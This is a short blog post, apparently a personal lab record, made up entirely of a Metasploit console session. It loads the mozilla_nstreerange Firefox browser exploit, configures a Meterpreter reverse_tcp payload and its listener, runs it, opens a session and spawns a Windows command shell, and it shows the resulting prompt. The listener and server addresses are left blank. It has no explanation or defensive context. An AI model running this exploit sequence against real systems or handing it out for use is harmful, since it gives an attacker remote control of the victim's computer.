control – metasploit mozilla_nstreerange

use exploit/windows/browser/mozilla_nstreerange
set ssl version ssl3
set srvport 8101
set lport 4465
set ssl 0
set payload windows/meterpreter/reverse_tcp
set target 0
set srvhost
set lhost
set uripath /site
exploit -j

Meterpreter session 1 opened ( ->

sessions -i 1
execute -f cmd.exe -c
interact 1

Interacting with channel 1…

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\Mozilla Firefox>


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s